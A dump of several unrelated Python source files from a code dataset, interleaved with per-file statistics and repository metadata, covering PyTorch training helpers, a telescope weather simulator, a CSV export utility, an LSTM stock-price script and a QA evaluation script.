self.layer2 = nn.Linear(8, output_size)
self.out = nn.Softmax()
def forward(self, input_):
out = self.layer1(input_)
out = self.relu(out)
out = self.layer2(out)
out = self.out(out)
return out
def train_epoch(model, opt, criterion, X, y, batch_size=50):
model.train()
losses = []
for beg_i in range(0, X.size(0), batch_size):
x_batch = X[beg_i : beg_i + batch_size, :]
# y_hat will be (batch_size, 1) dim, so coerce target to look the same
y_batch = y[beg_i : beg_i + batch_size].reshape(-1, 1)
x_batch = Variable(x_batch)
y_batch = Variable(y_batch)
opt.zero_grad()
# (1) Forward
y_hat = model(x_batch)
# (2) Compute diff
loss = criterion(y_hat, y_batch)
# (3) Compute gradients
loss.backward()
# (4) update weights
opt.step()
losses.append(loss.data.numpy())
return losses
def build_classifier(X, num_labels):
class_model = BinModel(X.shape[1]) if num_labels == 2 else MultiModel(X.shape[1], num_labels)
class_opt = optim.Adam(class_model.parameters(), lr=0.001)
class_criterion = nn.BCELoss() if num_labels == 2 else nn.CrossEntropyLoss()
return class_model, class_opt, class_criterion
def build_regressor(X):
reg_model = RegModel(X.shape[1])
reg_opt = optim.Adam(reg_model.parameters(), lr=0.001)
reg_criterion = nn.MSELoss()
return reg_model, reg_opt, reg_criterion
def train_classifier(X, y, class_model, class_opt, class_criterion, n_epochs=5):
target_encoder = LabelEncoder()
target_encoder.fit(y)
transformed_y = target_encoder.transform(y)
bin_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
bin_t_y = torch.from_numpy(transformed_y).type(class_model.expected_target_type)
for e in range(n_epochs):
train_epoch(class_model, class_opt, class_criterion, bin_t_X, bin_t_y)
def train_regressor(X, y, reg_model, reg_opt, reg_criterion, n_epochs=5):
reg_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
reg_t_y = torch.from_numpy(y.values).type(torch.FloatTensor)
for e in range(n_epochs):
train_epoch(reg_model, reg_opt, reg_criterion, reg_t_X, reg_t_y)
def save_torch_model(model, output_dir_path, filename="torch_bin.pth"):
output_file_path = Path(output_dir_path) / filename
torch.save(model, output_file_path)
def subset_data(X):
numerics = ["int16", "int32", "int64", "float16", "float32", "float64"]
# exclude any completely-missing columns when checking for numerics
num_features = list(X.dropna(axis=1, how="all").select_dtypes(include=numerics).columns)
# keep numeric features, zero-impute any missing values
# obviously this is a very rudimentary approach to handling missing values
# a more sophisticated imputer can be implemented by making use of custom transform, load, and predict hooks
return X[num_features].fillna(0)
| 31.810811
| 112
| 0.656542
| 693
| 4,708
| 4.236652
| 0.271284
| 0.021798
| 0.027248
| 0.016349
| 0.361035
| 0.300409
| 0.191417
| 0.191417
| 0.172343
| 0.172343
| 0
| 0.028934
| 0.229184
| 4,708
| 147
| 113
| 32.027211
| 0.780105
| 0.104715
| 0
| 0.300971
| 0
| 0
| 0.012372
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126214
| false
| 0
| 0.067961
| 0
| 0.31068
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13984baeb601966ec125e0ffbdce4b6e8815be83
| 9,894
|
py
|
Python
|
py/surveysim/weather.py
|
mlandriau/surveysim
|
e7a323d6c4031b1b8df25e776dbe81188fbe8860
|
[
"BSD-3-Clause"
] | null | null | null |
py/surveysim/weather.py
|
mlandriau/surveysim
|
e7a323d6c4031b1b8df25e776dbe81188fbe8860
|
[
"BSD-3-Clause"
] | 55
|
2016-11-14T21:58:11.000Z
|
2021-03-16T01:07:31.000Z
|
py/surveysim/weather.py
|
mlandriau/surveysim
|
e7a323d6c4031b1b8df25e776dbe81188fbe8860
|
[
"BSD-3-Clause"
] | 4
|
2016-11-19T00:17:02.000Z
|
2021-02-24T14:38:46.000Z
|
"""Simulate stochastic observing weather conditions.
The simulated conditions include seeing, transparency and the dome-open fraction.
"""
from __future__ import print_function, division, absolute_import
from datetime import datetime
import numpy as np
import astropy.time
import astropy.table
import astropy.units as u
import desiutil.log
import desimodel.weather
import desisurvey.config
import desisurvey.ephem
import desisurvey.utils
class Weather(object):
"""Simulate weather conditions affecting observations.
The start/stop date range is taken from the survey config.
Seeing and transparency values are stored with 32-bit floats to save
some memory.
Parameters
----------
seed : int
Random number seed to use to generate stochastic conditions.
The seed determines the same seeing and transparency realization
independent of the value of ``replay``.
replay : str
Either 'random' or a comma-separated list of years whose
historical weather should be replayed, e.g. 'Y2010,Y2012'.
Replayed weather will be used cyclically if necessary.
Random weather will be a boostrap sampling of all available
years with historical weather data. Use 'Y2015' for the
worst-case weather scenario.
time_step : float or :class:`astropy.units.Quantity`, optional
Time step calculating updates. Must evenly divide 24 hours.
If unitless float, will be interpreted as minutes.
restore : filename or None
Restore an existing weather simulation from the specified file name.
All other parameters are ignored when this is provided. A relative path
name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
extra_downtime : float
Additionally close the dome completely on some nights. Nights are
chosen randomly, with the chance of the night being closed equal to
extra_random_close_fraction. This is intended to include margin.
"""
def __init__(self, seed=1, replay='random', time_step=5, restore=None,
extra_downtime=0):
if not isinstance(time_step, u.Quantity):
time_step = time_step * u.min
self.log = desiutil.log.get_logger()
config = desisurvey.config.Configuration()
ephem = desisurvey.ephem.get_ephem()
if restore is not None:
fullname = config.get_path(restore)
self._table = astropy.table.Table.read(fullname)
self.start_date = desisurvey.utils.get_date(
self._table.meta['START'])
self.stop_date = desisurvey.utils.get_date(
self._table.meta['STOP'])
self.num_nights = self._table.meta['NIGHTS']
self.steps_per_day = self._table.meta['STEPS']
self.replay = self._table.meta['REPLAY']
self.log.info('Restored weather from {}.'.format(fullname))
return
else:
self.log.info('Generating random weather with seed={} replay="{}".'
.format(seed, replay))
gen = np.random.RandomState(seed)
# Use our config to set any unspecified dates.
start_date = config.first_day()
stop_date = config.last_day()
num_nights = (stop_date - start_date).days
if num_nights <= 0:
raise ValueError('Expected start_date < stop_date.')
# Check that the time step evenly divides 24 hours.
steps_per_day = int(round((1 * u.day / time_step).to(1).value))
if not np.allclose((steps_per_day * time_step).to(u.day).value, 1.):
raise ValueError(
'Requested time_step does not evenly divide 24 hours: {0}.'
.format(time_step))
# Calculate the number of times where we will tabulate the weather.
num_rows = num_nights * steps_per_day
meta = dict(START=str(start_date), STOP=str(stop_date),
NIGHTS=num_nights, STEPS=steps_per_day, REPLAY=replay)
self._table = astropy.table.Table(meta=meta)
# Initialize column of MJD timestamps.
t0 = desisurvey.utils.local_noon_on_date(start_date)
times = t0 + (np.arange(num_rows) / float(steps_per_day)) * u.day
self._table['mjd'] = times.mjd
# Generate a random atmospheric seeing time series.
dt_sec = 24 * 3600. / steps_per_day
self._table['seeing'] = desimodel.weather.sample_seeing(
num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32)
# Generate a random atmospheric transparency time series.
self._table['transparency'] = desimodel.weather.sample_transp(
num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32)
if replay == 'random':
# Generate a bootstrap sampling of the historical weather years.
years_to_simulate = config.last_day().year - config.first_day().year + 1
history = ['Y{}'.format(year) for year in range(2007, 2018)]
replay = ','.join(gen.choice(history, years_to_simulate, replace=True))
# Lookup the dome closed fractions for each night of the survey.
# This step is deterministic and only depends on the config weather
# parameter, which specifies which year(s) of historical daily
# weather to replay during the simulation.
dome_closed_frac = desimodel.weather.dome_closed_fractions(
start_date, stop_date, replay=replay)
r = gen.uniform(size=num_nights)
r2 = gen.uniform(size=num_nights)
dome_closed_frac[r2 < extra_downtime] = 1.
# Convert fractions of scheduled time to hours per night.
ilo, ihi = (start_date - ephem.start_date).days, (stop_date - ephem.start_date).days
bright_dusk = ephem._table['brightdusk'].data[ilo:ihi]
bright_dawn = ephem._table['brightdawn'].data[ilo:ihi]
dome_closed_time = dome_closed_frac * (bright_dawn - bright_dusk)
# Randomly pick between three scenarios for partially closed nights:
# 1. closed from dusk, then open the rest of the night.
# 2. open at dusk, then closed for the rest of the night.
# 3. open and dusk and dawn, with a closed period during the night.
# Pick scenarios 1+2 with probability equal to the closed fraction.
# Use a fixed number of random numbers to decouple from the seeing
# and transparency sampling below.
self._table['open'] = np.ones(num_rows, bool)
for i in range(num_nights):
sl = slice(i * steps_per_day, (i + 1) * steps_per_day)
night_mjd = self._table['mjd'][sl]
# Dome is always closed before dusk and after dawn.
closed = (night_mjd < bright_dusk[i]) | (night_mjd >= bright_dawn[i])
if dome_closed_frac[i] == 0:
# Dome open all night.
pass
elif dome_closed_frac[i] == 1:
# Dome closed all night. This occurs with probability frac / 2.
closed[:] = True
elif r[i] < 0.5 * dome_closed_frac[i]:
# Dome closed during first part of the night.
# This occurs with probability frac / 2.
closed |= (night_mjd < bright_dusk[i] + dome_closed_time[i])
elif r[i] < dome_closed_frac[i]:
# Dome closed during last part of the night.
# This occurs with probability frac / 2.
closed |= (night_mjd > bright_dawn[i] - dome_closed_time[i])
else:
# Dome closed during the middle of the night.
# This occurs with probability 1 - frac. Use the value of r[i]
# as the fractional time during the night when the dome reopens.
dome_open_at = bright_dusk[i] + r[i] * (bright_dawn[i] - bright_dusk[i])
dome_closed_at = dome_open_at - dome_closed_time[i]
closed |= (night_mjd >= dome_closed_at) & (night_mjd < dome_open_at)
self._table['open'][sl][closed] = False
self.start_date = start_date
self.stop_date = stop_date
self.num_nights = num_nights
self.steps_per_day = steps_per_day
self.replay = replay
def save(self, filename, overwrite=True):
"""Save the generated weather to a file.
The saved file can be restored using the constructor `restore`
parameter.
Parameters
----------
filename : str
Name of the file where the weather should be saved. A
relative path name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
overwrite : bool
Silently overwrite any existing file when this is True.
"""
config = desisurvey.config.Configuration()
filename = config.get_path(filename)
self._table.write(filename, overwrite=overwrite)
self.log.info('Saved weather to {0}.'.format(filename))
def get(self, time):
"""Get the weather conditions at the specified time(s).
Returns the conditions at the closest tabulated time, rather than
using interpolation.
Parameters
----------
time : astropy.time.Time
Time(s) when the simulated weather is requested.
Returns
-------
table slice
Slice of precomputed table containing row(s) corresponding
to the requested time(s).
"""
offset = np.floor(
(time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5
).astype(int)
if np.any(offset < 0) or np.any(offset > len(self._table)):
raise ValueError('Cannot get weather beyond tabulated range.')
return self._table[offset]
| 43.973333
| 92
| 0.63392
| 1,279
| 9,894
| 4.761532
| 0.246286
| 0.031199
| 0.021675
| 0.009852
| 0.15665
| 0.103777
| 0.098851
| 0.082923
| 0.063383
| 0.063383
| 0
| 0.009968
| 0.280069
| 9,894
| 224
| 93
| 44.169643
| 0.845009
| 0.393168
| 0
| 0.057143
| 0
| 0
| 0.057512
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0.009524
| 0.104762
| 0
| 0.161905
| 0.009524
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1398a0a81ef6551f1edec803a59f1dbf8ef55e95
| 8,075
|
py
|
Python
|
lib/csv_writer.py
|
takeratta/ga-dev-tools
|
19dcf7c750af8214e5a306fc0f8e2b28bef7bb40
|
[
"Apache-2.0"
] | 2
|
2020-07-02T14:29:44.000Z
|
2021-12-02T09:31:36.000Z
|
lib/csv_writer.py
|
jeffreychung/ga-dev-tools
|
19dcf7c750af8214e5a306fc0f8e2b28bef7bb40
|
[
"Apache-2.0"
] | 3
|
2022-02-19T14:08:17.000Z
|
2022-03-03T22:32:16.000Z
|
lib/csv_writer.py
|
colorstheforce/ga-dev-tools
|
46dd9652f9a7d9f8255b6d401985fdcfb8b61b25
|
[
"Apache-2.0"
] | 1
|
2021-01-02T17:04:16.000Z
|
2021-01-02T17:04:16.000Z
|
# coding=utf-8
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility to convert a Data Export API reponse into TSV.
This provides utitlites to both print TSV files to the standard output
as well as directly to a file. This logic handles all the utf-8 conversion.
GetTsvFilePrinter: Returns an instantiated object to output to files.
GetTsvScreenPrinter: Returns an instantiated object to output to the screen.
UnicodeWriter(): Utf-8 encodes output.
ExportPrinter(): Converts the Data Export API response into tabular data.
"""
__author__ = 'api.nickm@ (Nick Mihailovski)'
import codecs
import csv
import StringIO
import sys
import types
# A list of special characters that need to be escaped.
SPECIAL_CHARS = ('+', '-', '/', '*', '=')
# TODO(nm): Test leading numbers.
def GetTsvFilePrinter(file_name):
"""Returns a ExportPrinter object to output to file_name.
Args:
file_name: string The name of the file to output to.
Returns:
The newly created ExportPrinter object.
"""
my_handle = open(file_name)
writer = UnicodeWriter(my_handle, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvScreenPrinter():
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(sys.stdout, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvStringPrinter(f):
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(f, dialect='excel-tab')
return ExportPrinter(writer)
# Wrapper to output to utf-8. Taken mostly / directly from Python docs:
# http://docs.python.org/library/csv.html
class UnicodeWriter(object):
"""A CSV writer which uses the csv module to output csv compatible formats.
Will write rows to CSV file "f", which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding='utf-8', **kwds):
# Redirect output to a queue
self.queue = StringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
# pylint: disable=g-bad-name
def writerow(self, row):
"""Writes a CSV row.
Args:
row: list The row to write to the CSV output.
"""
self.writer.writerow([s.encode('utf-8') for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode('utf-8')
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
# pylint: disable=g-bad-name
def writerows(self, rows):
"""Writes rows for CSV output.
Args:
rows: list of rows to write.
"""
for row in rows:
self.writerow(row)
class ExportPrinter(object):
"""Utility class to output a the data feed as tabular data."""
def __init__(self, writer):
"""Initializes the class.
Args:
writer: Typically an instance of UnicodeWriter. The interface for this
object provides two methods, writerow and writerow, which
accepts a list or a list of lists respectively and process them as
needed.
"""
self.writer = writer
def Output(self, results):
"""Outputs formatted rows of data retrieved from the Data Export API.
This uses the writer object to output the data in the Data Export API.
Args:
results: The response from the data export API.
"""
if not results.get('rows'):
self.writer.writerow('No Results found')
else:
self.OutputProfileName(results)
self.writer.writerow([])
self.OutputContainsSampledData(results)
self.writer.writerow([])
self.OutputQueryInfo(results)
self.writer.writerow([])
self.OutputHeaders(results)
self.OutputRows(results)
self.writer.writerow([])
self.OutputRowCounts(results)
self.OutputTotalsForAllResults(results)
def OutputProfileName(self, results):
"""Outputs the profile name along with the qurey."""
profile_name = ''
info = results.get('profileInfo')
if info:
profile_name = info.get('profileName')
self.writer.writerow(['Report For View (Profile): ', profile_name])
def OutputQueryInfo(self, results):
"""Outputs the query used."""
self.writer.writerow(['These query parameters were used:'])
query = results.get('query')
for key, value in query.iteritems():
if type(value) == types.ListType:
value = ','.join(value)
else:
value = str(value)
value = ExcelEscape(value)
self.writer.writerow([key, value])
def OutputContainsSampledData(self, results):
"""Outputs whether the resuls have been sampled."""
sampled_text = 'do not'
if results.get('containsSampledData'):
sampled_text = 'do'
row_text = 'These results %s contain sampled data.' % sampled_text
self.writer.writerow([row_text])
def OutputHeaders(self, results):
"""Outputs all the dimension and metric names in order."""
row = []
for header in results.get('columnHeaders'):
row.append(header.get('name'))
self.writer.writerow(row)
def OutputRows(self, results):
"""Outputs all the rows in the table."""
# Replace any first characters that have an = with '=
for row in results.get('rows'):
out_row = []
for cell in row:
cell = ExcelEscape(cell)
out_row.append(cell)
self.writer.writerow(out_row)
def OutputRowCounts(self, results):
"""Outputs how many rows were returned vs rows that were matched."""
items = str(results.get('itemsPerPage'))
matched = str(results.get('totalResults'))
output = [
['Rows Returned', items],
['Rows Matched', matched]
]
self.writer.writerows(output)
def OutputTotalsForAllResults(self, results):
"""Outputs the totals for all results matched by the query.
This is not the sum of the values returned in the response.
This will align the metric totals in the same columns as
the headers are printed. The totals are stored as a dict, where the
key is the metric name and the value is the total. To align these
totals in the proper columns, a position index of the metric name
and it's position in the table is first created. Then the totals
are added by position to a row of empty strings.
Args:
results: API Response from Core Reporting API.
"""
# Create the metric position index.
metric_index = {}
headers = results.get('columnHeaders')
for index in range(0, len(headers)):
header = headers[index]
if header.get('columnType') == 'METRIC':
metric_index[header.get('name')] = index
# Create a row of empty strings the same length as the header.
row = [''] * len(headers)
# Use the position index to output the totals in the right columns.
totals = results.get('totalsForAllResults')
for metric_name, metric_total in totals.iteritems():
index = metric_index[metric_name]
row[index] = metric_total
self.writer.writerows([['Totals For All Rows Matched'], row])
def ExcelEscape(input_value):
"""Escapes the first character of a string if it is special in Excel.
Args:
input_value: string The value to escape.
Returns:
A string that has the first character escaped if it is special.
"""
if input_value and input_value[0] in SPECIAL_CHARS:
return "'" + input_value
return input_value
| 30.130597
| 78
| 0.687059
| 1,094
| 8,075
| 5.031079
| 0.274223
| 0.030887
| 0.039244
| 0.014535
| 0.119004
| 0.0754
| 0.059411
| 0.023619
| 0.023619
| 0.023619
| 0
| 0.002994
| 0.213994
| 8,075
| 267
| 79
| 30.243446
| 0.864188
| 0.464025
| 0
| 0.081818
| 0
| 0
| 0.097986
| 0
| 0
| 0
| 0
| 0.003745
| 0
| 1
| 0.145455
| false
| 0
| 0.045455
| 0
| 0.254545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13991543937ea97e225d2fffa3ed5c4c26a13a38
| 2,924
|
py
|
Python
|
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py
|
yuwenxianglong/zhxsh.github.io
|
427d14b787e55df26e03a069288815b14ab6b534
|
[
"MIT"
] | null | null | null |
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py
|
yuwenxianglong/zhxsh.github.io
|
427d14b787e55df26e03a069288815b14ab6b534
|
[
"MIT"
] | 1
|
2021-03-30T04:35:57.000Z
|
2021-03-30T04:35:57.000Z
|
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py
|
yuwenxianglong/yuwenxianglong.github.io
|
196e32d2775ef3a3863603cb5c30023450a1944c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
@Project : RNN_Prediction
@Author : Xu-Shan Zhao
@Filename: stockPrediction202005201318.py
@IDE : PyCharm
@Time1 : 2020-05-20 13:18:46
@Time2 : 2020/5/20 13:18
@Month1 : 5月
@Month2 : 五月
"""
import tushare as ts
import tensorflow as tf
import pandas as pd
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
stock_catl = ts.get_hist_data('300750')
stock_catl = stock_catl.sort_index(ascending=True)
stock_catl = (stock_catl - stock_catl.mean()) / \
(stock_catl.max() - stock_catl.min())
# train, val = train_test_split(stock_catl, test_size=0.5)
# train = train.sort_index(ascending=True)
# val = val.sort_index(ascending=True)
train = stock_catl.iloc[:-60, :]
val = stock_catl.iloc[-60:, :]
window_size = 30
column = 'high'
epoches = 300
def batch_dataset(dataset):
dataset_batched = dataset.batch(window_size, drop_remainder=True)
return dataset_batched
def zip_ds(dataset):
ds_data = tf.constant(dataset.values, dtype=tf.float32)
ds_data = tf.data.Dataset.from_tensor_slices(ds_data). \
window(window_size, shift=1).flat_map(batch_dataset)
ds_label = tf.constant(dataset.values[window_size:], dtype=tf.float32)
ds_label = tf.data.Dataset.from_tensor_slices(ds_label)
ds_train = tf.data.Dataset.zip((ds_data, ds_label)).batch(128).repeat()
return ds_train
ds_train = zip_ds(train)
ds_val = zip_ds(val)
model = tf.keras.Sequential(
[
tf.keras.layers.LSTM(128, return_sequences=True, activation='relu'),
tf.keras.layers.LSTM(128, activation='relu'),
tf.keras.layers.Dense(13)
]
)
optimizer = tf.keras.optimizers.Adam(learning_rate=0.01)
model.compile(optimizer=optimizer, loss='mse')
history = model.fit(
ds_train, epochs=epoches,
steps_per_epoch=5,
validation_data=ds_val,
validation_steps=1
)
model.save('stockLSTM')
# Plot loss function
plt.figure(figsize=(19, 9))
ax = plt.gca()
plt.plot(range(len(history.history['loss'])), history.history['loss'])
plt.plot(range(len(history.history['val_loss'])), history.history['val_loss'])
ax.set_yscale('log')
plt.show()
# Compare fitting and real values.
dff = pd.DataFrame()
for i in range(len(stock_catl) - window_size):
fits = model.predict(tf.constant(tf.expand_dims(stock_catl.values[i:i + window_size, :], axis=0)))
dffits = pd.DataFrame(fits, columns=stock_catl.columns)
dff = dff.append(dffits)
dff.index = stock_catl.index[window_size:]
plt.figure(figsize=(19, 9))
dff[column].plot()
stock_catl.iloc[window_size:, :][column].plot(style='-o')
plt.show()
# To predict future 100 business days.
dfp = stock_catl.copy()
for i in range(100):
pres = model.predict(tf.constant(tf.expand_dims(dfp.values[-1 * window_size:], axis=0)))
dfpres = pd.DataFrame(pres, columns=stock_catl.columns)
dfp = dfp.append(dfpres, ignore_index=True)
dfp[column].plot()
plt.show()
| 28.666667
| 102
| 0.713748
| 443
| 2,924
| 4.534989
| 0.363431
| 0.080637
| 0.020906
| 0.026879
| 0.152812
| 0.093579
| 0.064709
| 0
| 0
| 0
| 0
| 0.03808
| 0.137825
| 2,924
| 101
| 103
| 28.950495
| 0.758826
| 0.151505
| 0
| 0.075758
| 0
| 0
| 0.023916
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.075758
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13998d176731562bde5bd78d5d04ea6a48f3fc9c
| 19,221
|
py
|
Python
|
language/labs/drkit/evaluate.py
|
Xtuden-com/language
|
70c0328968d5ffa1201c6fdecde45bbc4fec19fc
|
[
"Apache-2.0"
] | 1,199
|
2018-10-16T01:30:18.000Z
|
2022-03-31T21:05:24.000Z
|
language/labs/drkit/evaluate.py
|
Xtuden-com/language
|
70c0328968d5ffa1201c6fdecde45bbc4fec19fc
|
[
"Apache-2.0"
] | 116
|
2018-10-18T03:31:46.000Z
|
2022-03-24T13:40:50.000Z
|
language/labs/drkit/evaluate.py
|
Xtuden-com/language
|
70c0328968d5ffa1201c6fdecde45bbc4fec19fc
|
[
"Apache-2.0"
] | 303
|
2018-10-22T12:35:12.000Z
|
2022-03-27T17:38:17.000Z
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Evaluate lazy slot filling results."""
import codecs
import collections
import gzip
import json
import random
import re
import string
import unicodedata
from absl import app
from absl import flags
from bert import tokenization
from language.labs.drkit import input_fns
import numpy as np
import tensorflow.compat.v1 as tf
PUNCTUATION = frozenset(string.punctuation)
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string("ground_truth_file", None,
"File with ground truth answers.")
flags.DEFINE_string("predicted_answers_file", None,
"File with predicted answers from model.")
flags.DEFINE_string("relation_counts_file", None,
"JSON file with relation counts.")
class NumpyEncoder(json.JSONEncoder):
"""Special json encoder for numpy types."""
def default(self, obj):
if isinstance(obj, (np.int_, np.intc, np.intp, np.int8, np.int16, np.int32,
np.int64, np.uint8, np.uint16, np.uint32, np.uint64)):
return int(obj)
elif isinstance(obj, (np.float_, np.float16, np.float32, np.float64)):
return float(obj)
elif isinstance(obj, (np.ndarray,)): # This is the fix
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def wikimovie_eval_fn(dataset, results, name_map, output_prediction_file,
**kwargs):
"""Compute evaluation metrics for OneHopDataset or TwoHopDataset.
Args:
dataset: An object of type OneHopDataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples}
gt_ques = {ex.qas_id: ex.question_text for ex in dataset.examples}
gt_entity = {ex.qas_id: ex.subject_entity[0] for ex in dataset.examples}
inf_chain = {ex.qas_id: ex.inference_chain for ex in dataset.examples}
# Compute basic metrics.
num_correct = 0.
all_predictions = {}
chain2stats = {ch: [0., 0.] for ch in inf_chain.values()}
incorrect_results, correct_results = [], []
for result in results:
qas_id = result["qas_ids"]
prediction = result["predictions"]
if prediction in gt_answer[qas_id]:
num_correct += 1
chain2stats[inf_chain[qas_id]][0] += 1
correct_results.append({
"qas_id": result["qas_ids"],
"question": gt_ques[qas_id],
"answers": gt_answer[qas_id],
"subject": gt_entity[qas_id],
"inf-chain": inf_chain[qas_id],
"predictions": result["predictions"],
})
for hop in range(3):
if "sparse_%d" % hop in result:
correct_results[-1].update({
"sparse_%d" % hop: result["sparse_%d" % hop],
"dense_%d" % hop: result["dense_%d" % hop],
"mention_%d" % hop: result["mention_%d" % hop],
"entity_%d" % hop: result["entity_%d" % hop],
"sparse_scores_%d" % hop: result["sparse_scores_%d" % hop],
"dense_scores_%d" % hop: result["dense_scores_%d" % hop],
"mention_scores_%d" % hop: result["mention_scores_%d" % hop],
"entity_scores_%d" % hop: result["entity_scores_%d" % hop],
})
else:
incorrect_results.append({
"qas_id": result["qas_ids"],
"question": gt_ques[qas_id],
"answers": gt_answer[qas_id],
"subject": gt_entity[qas_id],
"inf-chain": inf_chain[qas_id],
"predictions": result["predictions"],
})
for hop in range(3):
if "sparse_%d" % hop in result:
incorrect_results[-1].update({
"sparse_%d" % hop: result["sparse_%d" % hop],
"dense_%d" % hop: result["dense_%d" % hop],
"mention_%d" % hop: result["mention_%d" % hop],
"entity_%d" % hop: result["entity_%d" % hop],
"sparse_scores_%d" % hop: result["sparse_scores_%d" % hop],
"dense_scores_%d" % hop: result["dense_scores_%d" % hop],
"mention_scores_%d" % hop: result["mention_scores_%d" % hop],
"entity_scores_%d" % hop: result["entity_scores_%d" % hop],
})
chain2stats[inf_chain[qas_id]][1] += 1
all_predictions[qas_id] = name_map[str(prediction)]
accuracy = num_correct / len(all_predictions)
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
json.dump(
random.sample(incorrect_results, 100),
tf.gfile.Open(output_prediction_file + ".incorrect", "w"),
cls=NumpyEncoder)
json.dump(
random.sample(correct_results, 100),
tf.gfile.Open(output_prediction_file + ".correct", "w"),
cls=NumpyEncoder)
# Return metrics.
metrics = {
"accuracy": accuracy,
}
for ch, stats in chain2stats.items():
metrics["inference-chains-acc/" + ch] = stats[0] / stats[1]
return metrics
def multihop_eval_fn(dataset,
results,
name_map,
output_prediction_file,
supervision="mention",
**kwargs):
"""Compute evaluation metrics for OneHopDataset or TwoHopDataset.
Args:
dataset: An object of type OneHopDataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
supervision: Type of supervision used in the model.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_mentions = {ex.qas_id: ex.answer_mention[0] for ex in dataset.examples}
if supervision == "mention":
gt_answer = gt_mentions
else:
gt_answer = {ex.qas_id: ex.answer_entity[0] for ex in dataset.examples}
# Compute basic metrics.
num_correct = 0.
all_predictions = {}
for result in results:
qas_id = result["qas_ids"]
prediction = result["predictions"]
if prediction == gt_answer[qas_id]:
num_correct += 1
all_predictions[qas_id] = name_map[str(prediction)]
accuracy = num_correct / len(all_predictions)
# Compute advanced metrics.
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
micro, macro, _, _ = compute_scores(dataset.gt_file, output_prediction_file)
# Return metrics.
metrics = {
"accuracy": accuracy,
"micro-p": micro[0],
"micro-r": micro[1],
"micro-f": micro[2],
"macro-p": macro[0],
"macro-r": macro[1],
"macro-f": macro[2],
}
return metrics
def hotpot_eval_fn(dataset, results, name_map, output_prediction_file,
**kwargs):
"""Compute evaluation metrics for HotpotQADataset.
Args:
dataset: An object of type HotpotQADataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
